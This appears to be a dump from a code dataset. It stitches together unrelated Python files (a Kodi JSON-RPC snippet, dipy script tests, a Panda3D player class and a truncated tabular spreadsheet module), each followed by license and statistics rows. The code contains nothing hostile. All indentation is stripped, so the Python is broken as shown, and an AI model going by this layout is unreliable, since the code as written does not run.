def enable_notification(notifySocket):
global commandId
params = {}
commandObj = {}
commandObj['id'] = commandId
commandObj['method'] = "JSONRPC.SetNotificationStatus"
params['enabled'] = "true"
commandObj['params'] = params
command = json.dumps(commandObj) + '\n'
commandId = commandId + 1
notifySocket.send(command)
|
gpl-2.0
| 2,748,701,511,971,271,000
| 37.544304
| 92
| 0.469951
| false
| 4.300847
| false
| false
| false
|
maurozucchelli/dipy
|
dipy/tests/test_scripts.py
|
1
|
5495
|
# emacs: -*- mode: python; py-indent-offset: 4; indent-tabs-mode: nil -*-
# vi: set ft=python sts=4 ts=4 sw=4 et:
""" Test scripts
If we appear to be running from the development directory, use the scripts in
the top-level folder ``scripts``. Otherwise try and get the scripts from the
path
"""
from __future__ import division, print_function, absolute_import
import sys
import os
import shutil
from os.path import dirname, join as pjoin, isfile, isdir, abspath, realpath
from subprocess import Popen, PIPE
from nose.tools import assert_true, assert_false, assert_equal
import numpy.testing as nt
import nibabel as nib
from nibabel.tmpdirs import InTemporaryDirectory
from dipy.data import get_data
# Need shell to get path to correct executables
USE_SHELL = True
DEBUG_PRINT = os.environ.get('NIPY_DEBUG_PRINT', False)
DATA_PATH = abspath(pjoin(dirname(__file__), 'data'))
def local_script_dir(script_sdir):
# Check for presence of scripts in development directory. ``realpath``
# checks for the situation where the development directory has been linked
# into the path.
below_us_2 = realpath(pjoin(dirname(__file__), '..', '..'))
devel_script_dir = pjoin(below_us_2, script_sdir)
if isfile(pjoin(below_us_2, 'setup.py')) and isdir(devel_script_dir):
return devel_script_dir
return None
LOCAL_SCRIPT_DIR = local_script_dir('bin')
def run_command(cmd, check_code=True):
if not LOCAL_SCRIPT_DIR is None:
# Windows can't run script files without extensions natively so we need
# to run local scripts (no extensions) via the Python interpreter. On
# Unix, we might have the wrong incantation for the Python interpreter
# in the hash bang first line in the source file. So, either way, run
# the script through the Python interpreter
cmd = "%s %s" % (sys.executable, pjoin(LOCAL_SCRIPT_DIR, cmd))
if DEBUG_PRINT:
print("Running command '%s'" % cmd)
proc = Popen(cmd, stdout=PIPE, stderr=PIPE, shell=USE_SHELL)
stdout, stderr = proc.communicate()
if proc.poll() == None:
proc.terminate()
if check_code and proc.returncode != 0:
raise RuntimeError('Command "%s" failed with stdout\n%s\nstderr\n%s\n'
% (cmd, stdout, stderr))
return proc.returncode, stdout, stderr
def test_dipy_peak_extraction():
# test dipy_peak_extraction script
cmd = 'dipy_peak_extraction'
code, stdout, stderr = run_command(cmd, check_code=False)
assert_equal(code, 2)
def test_dipy_fit_tensor():
# test dipy_fit_tensor script
cmd = 'dipy_fit_tensor'
code, stdout, stderr = run_command(cmd, check_code=False)
assert_equal(code, 2)
def test_dipy_sh_estimate():
# test dipy_sh_estimate script
cmd = 'dipy_sh_estimate'
code, stdout, stderr = run_command(cmd, check_code=False)
assert_equal(code, 2)
def assert_image_shape_affine(filename, shape, affine):
assert_true(os.path.isfile(filename))
image = nib.load(filename)
assert_equal(image.shape, shape)
nt.assert_array_almost_equal(image.get_affine(), affine)
def test_dipy_fit_tensor():
with InTemporaryDirectory() as tmp:
dwi, bval, bvec = get_data("small_25")
# Copy data to tmp directory
shutil.copyfile(dwi, "small_25.nii.gz")
shutil.copyfile(bval, "small_25.bval")
shutil.copyfile(bvec, "small_25.bvec")
# Call script
cmd = ["dipy_fit_tensor", "--mask=none", "small_25.nii.gz"]
out = run_command(" ".join(cmd))
assert_equal(out[0], 0)
# Get expected values
img = nib.load("small_25.nii.gz")
affine = img.get_affine()
shape = img.shape[:-1]
# Check expected outputs
assert_image_shape_affine("small_25_fa.nii.gz", shape, affine)
assert_image_shape_affine("small_25_t2di.nii.gz", shape, affine)
assert_image_shape_affine("small_25_dirFA.nii.gz", shape, affine)
assert_image_shape_affine("small_25_ad.nii.gz", shape, affine)
assert_image_shape_affine("small_25_md.nii.gz", shape, affine)
assert_image_shape_affine("small_25_rd.nii.gz", shape, affine)
with InTemporaryDirectory() as tmp:
dwi, bval, bvec = get_data("small_25")
# Copy data to tmp directory
shutil.copyfile(dwi, "small_25.nii.gz")
shutil.copyfile(bval, "small_25.bval")
shutil.copyfile(bvec, "small_25.bvec")
# Call script
cmd = ["dipy_fit_tensor", "--save-tensor", "--mask=none", "small_25.nii.gz"]
out = run_command(" ".join(cmd))
assert_equal(out[0], 0)
# Get expected values
img = nib.load("small_25.nii.gz")
affine = img.get_affine()
shape = img.shape[:-1]
# Check expected outputs
assert_image_shape_affine("small_25_fa.nii.gz", shape, affine)
assert_image_shape_affine("small_25_t2di.nii.gz", shape, affine)
assert_image_shape_affine("small_25_dirFA.nii.gz", shape, affine)
assert_image_shape_affine("small_25_ad.nii.gz", shape, affine)
assert_image_shape_affine("small_25_md.nii.gz", shape, affine)
assert_image_shape_affine("small_25_rd.nii.gz", shape, affine)
# small_25_tensor saves the tensor as a symmetric matrix following
# the nifti standard.
ten_shape = shape + (1, 6)
assert_image_shape_affine("small_25_tensor.nii.gz", ten_shape,
affine)
|
bsd-3-clause
| -1,704,001,170,354,622,000
| 35.390728
| 84
| 0.648408
| false
| 3.326271
| true
| false
| false
|
MJ-meo-dmt/Ecliptic
|
src/player.py
|
1
|
10301
|
#!/usr/bin/python
# System imports
import sys, math, os
# Panda imports
from panda3d.core import *
from pandac.PandaModules import *
from direct.actor.Actor import Actor
from direct.interval.IntervalGlobal import *
from direct.task import Task
from direct.showbase.DirectObject import DirectObject
from panda3d.core import BitMask32
from panda3d.bullet import *
from direct.showbase.InputStateGlobal import inputState
# Game imports
from devconfig import *
from globals import *
from gui import *
#---------------------------------------------------------------------#
## Main Player Class.
class Player(object):
"""
Player Class:
This class handels all "Players" in game (Actors)
@method addEntity: Use this to add a created entity to the global entity Dict{}
"""
def __init__(self):
pass
# These are players and other entities
def addEntity(self, entityKey, entityObject):
"""
@param entityKey: Pref the name of the entity
@param entityObject: Pref the name of the created entity
"""
# Add entity to the global enity dict{}
ENTITY[entityKey] = entityObject
## MakePlayer Class
# Will move this class under physics.py so that we have some order.
class MakePlayer(DirectObject):
"""
MakePlayer Class:
This class handels the creation of Players.
Players will be stored in the Entity dict.
"""
def __init__(self):
"""
constructor:
@param name: String_name, for the Player - In game.
@param entityName: String_name for the PC - Player in ENTITY /
dict{} for all uses in code.
"""
self.direction = Vec3(0,0,0)
self.angular_direction = Vec3(0,0,0)
self.speed = 1
self.angular_speed = 3
# Setup Player inventory
self.playerDataStorage = [] # May change
## ADD MOUSE LOOK TASK TO TASKMGR
#taskMgr.add(self.look, 'camera')
# Crouch Flag
self.crouching = False
# Mouse look
self.omega = 0.0
# Setup player input
self.accept('space', self.jump)
self.accept('c', self.crouch) # We need to fix the height
self.accept( "escape",sys.exit )
self.accept('arrow_up', self.up )
self.accept('arrow_down', self.down )
self.accept('arrow_left', self.left )
self.accept('arrow_right', self.right)
self.accept("arrow_up-up", self.idle, ["up"])
self.accept("arrow_down-up", self.idle, ["down"])
self.accept("arrow_left-up", self.idle, ["left"])
self.accept("arrow_right-up", self.idle, ["right"])
#inputState.watchWithModifiers('forward', 'w')
#inputState.watchWithModifiers('left', 'a')
#inputState.watchWithModifiers('reverse', 's')
#inputState.watchWithModifiers('right', 'd')
#inputState.watchWithModifiers('turnLeft', 'q')
#inputState.watchWithModifiers('turnRight', 'e')
#inputState.watchWithModifiers('turnRight', 'e')
# Camera Setup for player
# Get the screen size for the camera controller
self.winXhalf = base.win.getXSize()/2
self.winYhalf = base.win.getYSize()/2
## SETUP CHARACTER AND CHARACTER SHAPE
# Setup Shape
# units = meters
# body height : 1.8 meters
# eyes line : 1.8 - 0.11 meters = 1.69 meters
# h is distance between the centers of the 2 spheres
# w is radius of the spheres
# 1.8 = 0.3 + 1.2 + 0.3
# center : 1.8/2 = 0.9
# camera height : 1.69-0.9 = 0.79
h = 1.2
w = 0.3
# Player needs different setup saam as bullet character controller.
# Atm force gets added onto the node making it ballich
shape = BulletCapsuleShape(w, h , ZUp)
node = BulletRigidBodyNode('Box')
node.setMass(1.0)
node.addShape(shape)
self.node = node
node.setAngularDamping(10)
np = GAMEPLAY_NODES['PLAYER'].attachNewNode(node)
np.setPos(0, 0, 1)
self.arm = np.attachNewNode('arm')
self.arm.setPos(0,0,0.2)
self.np = np
PHYSICS['WORLD'].attachRigidBody(node)
#self.character = BulletCharacterControllerNode(shape, 1, 'Player')
#-------------------------------------------------------------------#
# PLAYER GRAVITY SETTINGS AND FALL SPEED #
#self.character.setGravity(0.87)
#self.character.setFallSpeed(0.3)
#
#-------------------------------------------------------------------#
#self.characterNP = GAMEPLAY_NODES['PLAYER'].attachNewNode(self.character)
#self.characterNP.setPos(0, 0, 2) # May need some tweaking
#self.characterNP.setCollideMask(BitMask32.allOn())
# Attach the character to the base _Physics
#PHYSICS['WORLD'].attachCharacter(self.character)
# Reparent the camera to the player
#base.camera.reparentTo(self.np)
#base.camera.setPos(0,0,0.79)
#base.camLens.setNearFar(camNear,camFar)
base.camLens.setFov(90)
base.disableMouse()
gui = Crosshair()
self.arm = loader.loadModel('../assets/models/test.egg')
screens = self.arm.findAllMatches('**')
self.arm_screen = None
rot = 0
pos = 0
for screen in screens :
if screen.hasTag('screen'):
self.arm_screen = screen
rot = screen.getHpr()
pos = screen.getPos()
print("rotation"+str(rot))
self.actor = Actor('../assets/models/test.egg', {'anim1':'../assets/models/test-Anim0.egg'})
self.actor.reparentTo(self.np)
self.actor.loop('anim1')
self.actor.setPos(.0,-0.1,0.4)
self.actor.setH(180)
self.actor.node().setBounds(OmniBoundingVolume())
self.actor.node().setFinal(True)
#self.actor.setTwoSided(True)
#self.actor.reparentTo(self.world.buffer_system.geom_cam)
#self.actor.hide(self.world.buffer_system.light_mask)
# attach smth to hand
picker = self.actor.exposeJoint(None,"modelRoot","hand_picker")
arm_bone = self.actor.exposeJoint(None,"modelRoot","screen_picker")
self.arm_screen.reparentTo(arm_bone)
self.arm_screen.setH(self.arm_screen.getH()+90)
self.temp_animate = self.arm_screen
self.picker = picker
taskMgr.add(self.update,'update player position')
# Player Debug:
#print ""
#print "Player Character controller settings: "
#print ""
#print "Character Gravity: ", self.character.getGravity()
#print "Character Max Slope: ",self.character.getMaxSlope()
#print ""
def up(self):
self.direction += Vec3(0,1,0)
self.angular_direction += Vec3(1,0,0)
def down(self):
self.direction += Vec3(0,-1,0)
def left(self):
self.direction += Vec3(-1,0,0)
def right(self):
self.direction += Vec3(1,0,0)
def idle(self, key):
if(key == "up"):
self.direction -= Vec3(0,1,0)
self.angular_direction -= Vec3(1,0,0)
elif(key == "down"):
self.direction -= Vec3(0,-1,0)
elif(key == "left"):
self.direction -= Vec3(-1,0,0)
elif(key == "right"):
self.direction -= Vec3(1,0,0)
# Handle player jumping
def jump(self):
self.character.setMaxJumpHeight(2.3)
self.character.setJumpSpeed(4.5)
self.character.doJump()
# Handle player crouch. <Buged to shit>
def crouch(self):
self.crouching = not self.crouching
sz = self.crouching and 0.6 or 1.0
#self.character.getShape().setLocalScale(Vec3(1, 1, sz))
self.characterNP.setScale(Vec3(1, 1, sz) * 0.3048)
#self.characterNP.setPos(0, 0, -1 * sz)
# Handle player mouse
def look(self, task):
dt = globalClock.getDt()
# Handle mouse
md = base.win.getPointer(0)
x = md.getX()
y = md.getY()
if base.win.movePointer(0, self.winXhalf, self.winYhalf):
self.omega = (x - self.winXhalf)*-mouseSpeed
base.camera.setP( (clampScalar(-90,90, base.camera.getP() - (y - self.winYhalf)*0.09)) )
self.processInput(dt)
return task.cont
def update(self,task):
dt = globalClock.getDt()
self.np.setPos(self.np,self.direction * dt * self.speed)
base.camera.setPos(self.np.getPos()+ Vec3(0,0,0.79))
md = base.win.getPointer(0)
x = md.getX()
y = md.getY()
if base.win.movePointer(0, self.winXhalf, self.winYhalf):
base.camera.setP(base.camera.getP() - (y - self.winYhalf)*dt*self.angular_speed)
self.np.setH(self.np.getH() - (x - self.winXhalf)*dt*self.angular_speed)
base.camera.setH(self.np.getH())
base.camera.setR(self.np.getR())
self.node.setAngularFactor(0)
self.node.setAngularVelocity(0)
BUFFER_SYSTEM['main'].reflection_cube.setPos(base.camera.getPos())
BUFFER_SYSTEM['main'].reflection_cube.setHpr(base.camera.getHpr())
return task.cont
# Handle player input
def processInput(self, dt):
print(self.direction)
speed = Vec3(0, 0, 0)
#@param PCSpeed: Player move speed under devconfig.py
if inputState.isSet('forward'): speed.setY( PCSpeed)
if inputState.isSet('reverse'): speed.setY(-PCSpeed)
if inputState.isSet('left'): speed.setX(-PCSpeed)
if inputState.isSet('right'): speed.setX( PCSpeed)
self.character.setAngularMovement(self.omega)
self.character.setLinearMovement(speed, True)
|
bsd-3-clause
| 5,954,991,454,922,168,000
| 31.701587
| 101
| 0.558878
| false
| 3.616924
| false
| false
| false
|
yamins81/tabular
|
tabular/spreadsheet.py
|
1
|
57202
|
"""
Spreadsheet-style functions for NumPy ndarray with structured dtype or
recarray objects:
aggregate, aggregate_in, pivot, addrecords, addcols, deletecols, renamecol,
replace, colstack, rowstack, nullvalue
Note that these functions are also wrapped as methods of the tabular tabarray
object, which is a subclass of the numpy ndarray.
**See Also:**
:class:`tabular.tab.tabarray`
"""
__all__ = ['aggregate', 'aggregate_in', 'pivot', 'addrecords', 'addcols',
'deletecols', 'renamecol', 'replace', 'colstack', 'rowstack',
'join', 'strictjoin', 'DEFAULT_RENAMER']
import numpy as np
import types
import tabular.utils as utils
import tabular.fast as fast
from tabular.colors import GrayScale
def isftype(x):
a = lambda x : isinstance(x,types.FunctionType)
b = isinstance(x,types.BuiltinFunctionType)
c = isinstance(x,types.MethodType)
d = isinstance(x,types.BuiltinMethodType)
return a or b or c or d
def aggregate(X, On=None, AggFuncDict=None, AggFunc=None,
AggList=None, returnsort=False, KeepOthers=True,
keyfuncdict=None):
"""
Aggregate a ndarray with structured dtype (or recarray) on columns for
given functions.
Aggregate a numpy recarray (or tabular tabarray) on a set of specified
factors, using specified aggregation functions.
Intuitively, this function will aggregate the dataset `X` on a set of
columns, whose names are listed in `On`, so that the resulting aggregate
data set has one record for each unique tuples of values in those columns.
The more factors listed in `On` argument, the "finer" is the aggregation,
the fewer factors, the "coarser" the aggregation. For example, if::
On = 'A'
the resulting tabarray will have one record for each unique value of a in
X['A'], while if On = ['A', 'B'] then the resulting tabarray will have
one record for each unique (a, b) pair in X[['A', 'B']]
The `AggFunc` argument is a function that specifies how to aggregate the
factors _not_ listed in `On`, e.g. the so-called `Off` columns. For
example. For instance, if On = ['A', 'B'] and `C` is a third column, then ::
AggFunc = numpy.mean
will result in a tabarray containing a `C` column whose values are the
average of the values from the original `C` columns corresponding to each
unique (a, b) pair.
If you want to specify a different aggreagtion method for each `Off` column,
use `AggFuncDict` instead of AggFunc. `AggFuncDict` is a dictionary of
functions whose keys are column names. AggFuncDict[C] will be applied to
the C column, AggFuncDict[D] to the D column, etc. AggFunc and AggFuncDict
can be used simultaneously, with the elements of AggFuncDict overriding
AggFunc for the specified columns.
Using either AggFunc or AggFuncDict, the resulting tabarray has the same
columns as the original tabarray. Sometimes you want to specify the ability
to create new aggregate columns not corresponding to one specific column in the
original tabarray, and taking data from several. To achieve this, use the
AggList argument. AggList is a list of three-element lists of the form:
(name, func, col_names)
where `name` specifies the resulting column name in the aggregated tabarray,
`func` specifies the aggregation function, and `col_names` specifies the
list of columns names from the original tabarray that will be needed to
compute the aggregate values. (That is, for each unique tuple `t` in the `On`
columns, the subarray of X[col_names] for which X[On] == t is passed to
`func`.)
If an `Off` column is _not_ provided as a key in `AggFuncDict`, a default
aggregator function will be used: the sum function for numerical columns,
concatenation for string columns.
Implemented by the tabarray method
:func:`tabular.tab.tabarray.aggregate`.
**Parameters**
**X** : numpy ndarray with structured dtype or recarray
The data set to aggregate.
**On** : string or list of strings, optional
List of column names in `X`.
**AggFuncDict** : dictionary, optional
Dictionary where
* keys are some (all) column names of `X` that are NOT
in `On`
* values are functions that can be applied to lists or
numpy arrays.
This specifies how to aggregate the factors _not_ listed in
`On`, e.g. the so-called `Off` columns.
**AggFunc** : function, optional
Function that can be applied to lists or numpy arrays,
specifying how to aggregate factors not listed in either
`On` or the keys of `AggFuncDict`, e.g. a "default"
aggregation function for the `Off` columns not explicitly
listed in `AggFuncDict`.
**AggList** : list, optional
List of tuples
**returnsort** : Boolean, optional
If `returnsort == True`, then return a list of indices
describing how `X` was sorted as a result of aggregation.
Default value is `False`.
**Returns**
**agg** : numpy ndarray with structured dtype
Aggregated data set.
**index_array** : numpy ndarray (int, 1D)
Returned only if `returnsort == True`. List of indices
describing how `X` was sorted as a result of aggregation.
**See also:**
:func:`tabular.spreadsheet.aggregate_in`
"""
names = X.dtype.names
if len(X) == 0:
if returnsort:
return [X,None]
else:
return X
if On == None:
On = []
elif isinstance(On,str):
On = On.split(',')
assert all([o in names for o in On]), \
("Axes " + str([o for o in On if o not in names]) +
" can't be found.")
if AggList is None:
AggList = []
if AggFuncDict:
AggList += AggFuncDict.items()
for (i,x) in enumerate(AggList):
if utils.is_string_like(x):
AggList[i] = (x,)
elif isinstance(x,tuple):
assert 1 <= len(x) <= 3
assert isinstance(x[0],str)
if len(x) == 2 and isinstance(x[1],tuple):
assert len(x[1]) == 2
AggList[i] = (x[0],) + x[1]
else:
raise ValueError, 'bork'
Names = [x[0] for x in AggList]
assert Names == utils.uniqify(Names)
if KeepOthers:
AggList = [(x,) for x in X.dtype.names if x not in Names + On] + AggList
DefaultChoices = {'string':[], 'sum':[], 'first':[]}
for (i,v) in enumerate(AggList):
if len(v) == 1:
assert v[0] in X.dtype.names
if AggFunc:
AggList[i] = v + (AggFunc,v[0])
else:
AggList[i] = v + (DefaultChooser(X,v[0], DefaultChoices),v[0])
elif len(v) == 2:
if isftype(v[1]):
assert v[0] in X.dtype.names
AggList[i] = v + (v[0],)
elif utils.is_string_like(v[1]):
if AggFunc:
_a = v[1] in X.dtype.names
_b = isinstance(v[1],list) and set(v[1]) <= set(X.dtype.names)
assert _a or _b
AggList[i] = (v[0], AggFunc, v[1])
else:
assert v[1] in X.dtype.names
AggList[i] = (v[0],
DefaultChooser(X,v[1],
DefaultChoices),
v[1])
else:
raise ValueError,'No specific of name for column.'
elif len(v) == 3:
if utils.is_string_like(v[2]):
assert isftype(v[1]) and v[2] in X.dtype.names
else:
assert isftype(v[1]) and \
(isinstance(v[2],list) and \
set(v[2]) <= set(X.dtype.names))
if len(DefaultChoices['sum']) > 0:
print('No aggregation function provided for', DefaultChoices['sum'],
'so assuming "sum" by default.')
if len(DefaultChoices['string']) > 0:
print('No aggregation function provided for', DefaultChoices['string'],
'so assuming string concatenation by default.')
if len(DefaultChoices['first']) > 0:
print('No aggregation function provided for', DefaultChoices['first'],
'and neither summing nor concatenation works, so choosing '
'first value by default.')
return strictaggregate(X, On, AggList, returnsort, keyfuncdict)
def DefaultChooser(X,o,DC):
try:
sum(X[o][0:1])
DC['sum'].append(o)
return sum
except:
try:
''.join(X[o][0:1])
DC['string'].append(o)
return ''.join
except:
DC['first'].append(o)
return lambda x : x[0]
def strictaggregate(X,On,AggList,returnsort=False, keyfuncdict=None):
if len(On) > 0:
#if len(On) == 1:
# keycols = X[On[0]]
#else:
# keycols = X[On]
keycols = X[On]
if keyfuncdict is not None:
for _kf in keyfuncdict:
fn = keyfuncdict[_kf]
keycols[_kf] = np.array(map(fn, keycols[_kf]))
[D, index_array] = fast.recarrayuniqify(keycols)
X = X[index_array]
Diffs = np.append(np.append([-1], D[1:].nonzero()[0]), [len(D)])
else:
Diffs = np.array([-1, len(X)])
argcounts = dict([(o,
f.func_code.co_argcount - (len(f.func_defaults) if \
f.func_defaults != None else 0) if 'func_code' in dir(f) else 1)
for (o,f,g) in AggList])
OnCols = utils.fromarrays([X[o][Diffs[:-1]+1] for o in On],
type=np.ndarray, names=On)
AggColDict = dict([(o,
[f(X[g][Diffs[i]+1:Diffs[i+1]+1]) if argcounts[o] == 1 else \
f(X[g][Diffs[i]+1:Diffs[i+1]+1],X) for i in range(len(Diffs) - 1)]) \
for (o,f,g) in AggList])
if isinstance(AggColDict[AggList[0][0]][0],list) or \
isinstance(AggColDict[AggList[0][0]][0],np.ndarray):
lens = map(len, AggColDict[AggList[0][0]])
OnCols = OnCols.repeat(lens)
for o in AggColDict.keys():
AggColDict[o] = utils.listunion(AggColDict[o])
Names = [v[0] for v in AggList]
AggCols = utils.fromarrays([AggColDict[o] for o in Names],
type=np.ndarray, names=Names)
if returnsort:
return [colstack([OnCols,AggCols]),index_array]
else:
return colstack([OnCols,AggCols])
def aggregate_in(Data, On=None, AggFuncDict=None, AggFunc=None, AggList=None,
interspersed=True):
"""
Aggregate a ndarray with structured dtype or recarray
and include original data in the result.
Take aggregate of data set on specified columns, then add the resulting
rows back into data set to make a composite object containing both original
non-aggregate data rows as well as the aggregate rows.
First read comments for :func:`tabular.spreadsheet.aggregate`.
This function returns a numpy ndarray, with the number of rows equaling::
len(Data) + len(A)
where `A` is the the result of::
Data.aggregate(On,AggFuncDict)
`A` represents the aggregate rows; the other rows were the original data
rows.
This function supports _multiple_ aggregation, meaning that one can first
aggregate on one set of factors, then repeat aggregation on the result for
another set of factors, without the results of the first aggregation
interfering the second. To achieve this, the method adds two new columns:
* a column called "__aggregates__" specifying on which factors the rows
that are aggregate rows were aggregated. Rows added by aggregating on
factor `A` (a column in the original data set) will have `A` in the
"__aggregates__" column. When multiple factors `A1`, `A2` , ... are
aggregated on, the notation is a comma-separated list: `A1,A2,...`.
This way, when you call `aggregate_in` again, the function only
aggregates on the columns that have the empty char '' in their
"__aggregates__" column.
* a column called '__color__', specifying Gray-Scale colors for
aggregated rows that will be used by the Data Environment system
browser for colorizing the data. When there are multiple levels of
aggregation, the coarser aggregate groups (e.g. on fewer factors) get
darker gray color then those on finer aggregate groups (e.g. more
factors).
Implemented by the tabarray method
:func:`tabular.tab.tabarray.aggregate_in`.
**Parameters**
**Data** : numpy ndarray with structured dtype or recarray
The data set to aggregate in.
**On** : list of strings, optional
List of column names in `X`.
**AggFuncDict** : dictionary, optional
Dictionary where
* keys are some (all) column names of `X` that are NOT in
`On`
* values are functions that can be applied to lists or
numpy arrays.
This specifies how to aggregate the factors _not_ listed in
`On`, e.g. the so-called `Off` columns.
**AggFunc** : function, optional
Function that can be applied to lists or numpy arrays,
specifying how to aggregate factors not listed in either
`On` or the keys of `AggFuncDict`, e.g. a "default"
aggregation function for the `Off` columns not explicitly
listed in `AggFuncDict`.
**interspersed** : boolean, optional
* If `True`, aggregate rows are interleaved with the data
of which they are aggregates.
* If `False`, all aggregate rows placed at the end of the
array.
**Returns**
**agg** : numpy ndarray with structured dtype
Composite aggregated data set plus original data set.
**See also:**
:func:`tabular.spreadsheet.aggregate`
"""
# See if there's an '__aggregates__ column'.
# If so, strip off all those that are nontrivial.
Data = deletecols(Data,'__color__')
if '__aggregates__' in Data.dtype.names:
X = Data[Data['__aggregates__'] == ''][:]
OldAggregates = Data[Data['__aggregates__'] != ''][:]
AggVars = utils.uniqify(utils.listunion([x.split(',') for x in
OldAggregates['__aggregates__']]))
else:
X = Data
OldAggregates = Data[0:0]
AggVars = []
if On == None:
On = []
NewAggregates = aggregate(X, On, AggFuncDict=AggFuncDict,
AggFunc=AggFunc, AggList=AggList, KeepOthers=True)
on = ','.join(On)
NewAggregates = addcols(NewAggregates,
utils.fromarrays([[on]*len(NewAggregates)],
type=np.ndarray, names=['__aggregates__']))
AggVars = utils.uniqify(AggVars + On)
Aggregates = rowstack([OldAggregates,NewAggregates],mode='nulls')
ANLen = np.array([len(x.split(',')) for x in Aggregates['__aggregates__']])
U = np.array(utils.uniqify(ANLen)); U.sort()
[A,B] = fast.equalspairs(ANLen,U)
Grays = np.array(grayspec(len(U)))
AggColor = utils.fromarrays([Grays[A]], type=np.ndarray,
names = ['__color__'])
Aggregates = addcols(Aggregates,AggColor)
if not interspersed or len(AggVars) == 0:
return rowstack([X,Aggregates],mode='nulls')
else:
s = ANLen.argsort()
Aggregates = Aggregates[s[range(len(Aggregates) - 1, -1, -1)]]
X.sort(order = AggVars)
Diffs = np.append(np.append([0], 1 + (X[AggVars][1:] !=
X[AggVars][:-1]).nonzero()[0]), [len(X)])
DiffAtts = ([[t for t in AggVars if X[t][Diffs[i]] != X[t][Diffs[i+1]]]
for i in range(len(Diffs) - 2)]
if len(Diffs) > 2 else []) + [AggVars]
HH = {}
for l in utils.uniqify(Aggregates['__aggregates__']):
Avars = l.split(',')
HH[l] = fast.recarrayequalspairs(X[Avars][Diffs[:-1]],
Aggregates[Avars])
Order = []
for i in range(len(Diffs)-1):
Order.extend(range(Diffs[i], Diffs[i+1]))
Get = []
for l in HH.keys():
Get += [len(X) + j for j in
HH[l][2][range(HH[l][0][i], HH[l][1][i])] if
len(set(DiffAtts[i]).intersection(
Aggregates['__aggregates__'][j].split(','))) > 0 and
set(Aggregates['__aggregates__'][j].split(',')) ==
set(l.split(','))]
Order.extend(Get)
return rowstack([X, Aggregates], mode='nulls')[Order]
def grayspec(k):
"""
List of gray-scale colors in HSV space as web hex triplets.
For integer argument k, returns list of `k` gray-scale colors, increasingly
light, linearly in the HSV color space, as web hex triplets.
Technical dependency of :func:`tabular.spreadsheet.aggregate_in`.
**Parameters**
**k** : positive integer
Number of gray-scale colors to return.
**Returns**
**glist** : list of strings
List of `k` gray-scale colors.
"""
ll = .5
ul = .8
delta = (ul - ll) / k
return [GrayScale(t) for t in np.arange(ll, ul, delta)]
def pivot(X, a, b, Keep=None, NullVals=None, order = None, prefix='_'):
'''
Implements pivoting on numpy ndarrays (with structured dtype) or recarrays.
See http://en.wikipedia.org/wiki/Pivot_table for information about pivot
tables.
Returns `X` pivoted on (a,b) with `a` as the row axis and `b` values as the
column axis.
So-called "nontrivial columns relative to `b`" in `X` are added as
color-grouped sets of columns, and "trivial columns relative to `b`" are
also retained as cross-grouped sets of columns if they are listed in `Keep`
argument.
Note that a column `c` in `X` is "trivial relative to `b`" if for all rows
i, X[c][i] can be determined from X[b][i], e.g the elements in X[c] are in
many-to-any correspondence with the values in X[b].
The function will raise an exception if the list of pairs of value in
X[[a,b]] is not the product of the individual columns values, e.g.::
X[[a,b]] == set(X[a]) x set(X[b])
in some ordering.
Implemented by the tabarray method :func:`tabular.tab.tabarray.pivot`
**Parameters**
**X** : numpy ndarray with structured dtype or recarray
The data set to pivot.
**a** : string
Column name in `X`.
**b** : string
Another column name in `X`.
**Keep** : list of strings, optional
List of other columns names in `X`.
**NullVals** : optional
Dictionary mapping column names in `X` other than `a` or
`b` to appropriate null values for their types.
If `None`, then the null values defined by the `nullvalue`
function are used, see
:func:`tabular.spreadsheet.nullvalue`.
**prefix** : string, optional
Prefix to add to `coloring` keys corresponding to
cross-grouped "trivial columns relative to `b`". Default
value is an underscore, '_'.
**Returns**
**ptable** : numpy ndarray with structured dtype
The resulting pivot table.
**coloring** : dictionary
Dictionary whose keys are strings and corresponding values
are lists of column names (e.g. strings).
There are two groups of keys:
* So-called "nontrivial columns relative to `b`" in `X`.
These correspond to columns in::
set(`X.dtype.names`) - set([a, b])
* Cross-grouped "trivial columns relative to `b`". The
`prefix` is used to distinguish these.
The `coloring` parameter is used by the the tabarray pivot
method, :func:`tabular.tab.tabarray.pivot`.
See :func:`tabular.tab.tabarray.__new__` for more
information about coloring.
'''
othernames = [o for o in X.dtype.names if o not in [a,b]]
for c in [a,b]:
assert c in X.dtype.names, 'Column ' + c + ' not found.'
[D,s] = fast.recarrayuniqify(X[[a,b]])
unique_ab = X[[a,b]][s[D.nonzero()[0]]]
assert len(X) == len(unique_ab) , \
('Pairs of values in columns', a, 'and', b, 'must be unique.')
[D,s] = fast.arrayuniqify(X[a])
unique_a = X[a][s[D.nonzero()[0]]]
[D,s] = fast.arrayuniqify(X[b])
unique_b = X[b][s[D.nonzero()[0]]]
Da = len(unique_a)
Db = len(unique_b)
if len(X) != Da * Db:
if list(X.dtype.names).index(a) < list(X.dtype.names).index(b):
n1 = a ; f1 = unique_a; n2 = b ; f2 = unique_b
else:
n1 = b ; f1 = unique_b; n2 = a ; f2 = unique_a
dtype = np.dtype([(n1,f1.dtype.descr[0][1]),(n2,f2.dtype.descr[0][1])])
allvalues = utils.fromarrays([np.repeat(f1,
len(f2)),
np.tile(f2,len(f1))],
np.ndarray,
dtype=dtype)
missingvalues = allvalues[np.invert(fast.recarrayisin(allvalues,
X[[a,b]]))]
if NullVals == None:
NullVals = {}
if not isinstance(NullVals,dict):
if hasattr(NullVals,'__call__'):
NullVals = dict([(o,NullVals(o)) for o in othernames])
else:
NullVals = dict([(o,NullVals) for o in othernames])
nullvals = utils.fromrecords([[NullVals[o] if o in NullVals.keys()
else utils.DEFAULT_NULLVALUE(X[o][0]) for o in
othernames]], type=np.ndarray, names=othernames)
nullarray = nullvals.repeat(len(missingvalues))
Y = colstack([missingvalues, nullarray])
Y = Y.astype(np.dtype([(o,
X.dtype[o].descr[0][1]) for o in Y.dtype.names]))
X = rowstack([X, Y])
X.sort(order = [a,b])
Bvals = X[b][:Db]
bnames = [str(bv).replace(' ','') for bv in Bvals]
assert (len(set(othernames).intersection(bnames)) == 0 and
a not in bnames), ('Processed values of column', b,
'musn\'t intersect with other column names.')
acol = X[a][::Db]
Cols = [acol]
names = [a]
Trivials = []
NonTrivials = []
for c in othernames:
Z = X[c].reshape((Da,Db))
if all([len(set(Z[:,i])) == 1 for i in range(Z.shape[1])]):
Trivials.append(c)
else:
NonTrivials.append(c)
Cols += [Z[:,i] for i in range(Z.shape[1])]
names += [bn + '_' + c for bn in bnames]
if order is not None:
ordering = [names.index(ord) for ord in order]
Cols = [Cols[i] for i in ordering]
names = [names[i] for i in ordering]
dtype = np.dtype([(n,c.dtype.descr[0][1]) for (n,c) in zip(names,Cols)])
